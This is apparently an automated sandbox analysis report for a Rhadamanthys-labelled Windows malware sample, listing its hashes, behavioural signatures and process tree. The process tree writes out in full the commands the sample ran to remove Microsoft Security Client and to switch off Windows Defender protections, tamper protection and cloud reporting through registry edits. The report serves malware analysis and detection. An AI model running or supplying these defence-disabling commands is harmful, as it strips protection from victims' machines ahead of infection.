Analysis
-
max time kernel
140s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
04/04/2025, 04:07
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe
-
Size
92KB
-
MD5
b6b0e732249c57cd22902a1c90d402b0
-
SHA1
ed34ee679485983e163c50c292ab6371b16ffe65
-
SHA256
c942c117e04a6173f1ee6da437a4e42544a92e4052fa72ea52dbc1e17ee138a7
-
SHA512
5fb50aa6f8fb7263b044f729d05639e0ed1f374de8400cbd450465d729714b385d092398f5ff0796a1b6edd13242248ae2757366517814c3619a9073e2231cbb
-
SSDEEP
1536:+PARF/rdv9TYMbonaTmYng6Zy35zyRZWvTEkO/+8ytCYsv7JTU:+4Dj0MbbnTayP6TEZ/+wY
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" reg.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 21 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 2588 wrote to memory of 2396 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 96 PID 2588 wrote to memory of 2396 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 96 PID 2588 wrote to memory of 2396 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 96 PID 2588 wrote to memory of 4936 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 103 PID 2588 wrote to memory of 4936 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 103 PID 2588 wrote to memory of 4936 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 103 PID 2588 wrote to memory of 4836 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 105 PID 2588 wrote to memory of 4836 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 105 PID 2588 wrote to memory of 4836 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 105 PID 2588 wrote to memory of 2160 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 107 PID 2588 wrote to memory of 2160 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 107 PID 2588 wrote to memory of 2160 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 107 PID 2588 wrote to memory of 3464 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 109 PID 2588 wrote to memory of 3464 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 109 PID 2588 wrote to memory of 3464 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 109 PID 2588 wrote to memory of 1352 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 111 PID 2588 wrote to memory of 1352 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 111 PID 2588 wrote to memory of 1352 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 111 PID 2588 wrote to memory of 5996 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 113 PID 2588 wrote to memory of 5996 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 113 PID 2588 wrote to memory of 5996 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 113 PID 2588 wrote to memory of 1716 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 115 PID 2588 wrote to memory of 1716 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 115 PID 2588 wrote to memory of 1716 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 115 PID 2588 wrote to memory of 1720 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 117 PID 2588 wrote to memory of 1720 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 117 PID 2588 wrote to memory of 1720 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 117 PID 4936 wrote to memory of 3252 4936 cmd.exe 119 PID 4936 wrote to memory of 3252 4936 cmd.exe 119 PID 4936 wrote to memory of 3252 4936 cmd.exe 119 PID 4836 wrote to memory of 924 4836 cmd.exe 120 PID 4836 wrote to memory of 924 4836 cmd.exe 120 PID 4836 wrote to memory of 924 4836 cmd.exe 120 PID 2588 wrote to memory of 5428 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 121 PID 2588 wrote to memory of 5428 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 121 PID 2588 wrote to memory of 5428 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 121 PID 2588 wrote to memory of 4324 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 123 PID 2588 wrote to memory of 4324 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 123 PID 2588 wrote to memory of 4324 2588 2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe 123 PID 2160 wrote to memory of 1372 2160 cmd.exe 124 PID 2160 wrote to memory of 1372 2160 cmd.exe 124 PID 2160 wrote to memory of 1372 2160 cmd.exe 124 PID 3464 wrote to memory of 1608 3464 cmd.exe 126 PID 3464 wrote to memory of 1608 3464 cmd.exe 126 PID 3464 wrote to memory of 1608 3464 cmd.exe 126 PID 1352 wrote to memory of 3792 1352 cmd.exe 127 PID 1352 wrote to memory of 3792 1352 cmd.exe 127 PID 1352 wrote to memory of 3792 1352 cmd.exe 127 PID 5996 wrote to memory of 4220 5996 cmd.exe 128 PID 5996 wrote to memory of 4220 5996 cmd.exe 128 PID 5996 wrote to memory of 4220 5996 cmd.exe 128 PID 1720 wrote to memory of 460 1720 cmd.exe 129 PID 1720 wrote to memory of 460 1720 cmd.exe 129 PID 1720 wrote to memory of 460 1720 cmd.exe 129 PID 4324 wrote to memory of 3040 4324 cmd.exe 130 PID 4324 wrote to memory of 3040 4324 cmd.exe 130 PID 4324 wrote to memory of 3040 4324 cmd.exe 130 PID 5428 wrote to memory of 2960 5428 cmd.exe 131 PID 5428 wrote to memory of 2960 5428 cmd.exe 131 PID 5428 wrote to memory of 2960 5428 cmd.exe 131
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-04_b6b0e732249c57cd22902a1c90d402b0_rhadamanthys.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Program Files\Microsoft Security Client\Setup.exe" /x /s2⤵
- System Location Discovery: System Language Discovery
PID:2396
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:3252
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:924
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1372
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3464 -
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵
- System Location Discovery: System Language Discovery
PID:1608
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:3792
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5996 -
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- System Location Discovery: System Language Discovery
PID:4220
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /P "P:\Cebtenz Svyrf\Zvpebfbsg Frphevgl Pyvrag\Frghc.rkr" /k /f2⤵
- System Location Discovery: System Language Discovery
PID:1716
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:460
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpCloudBlockLevel" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5428 -
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpCloudBlockLevel" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:2960
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4324 -
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f3⤵
- Modifies Windows Defender TamperProtection settings
- System Location Discovery: System Language Discovery
PID:3040
-
-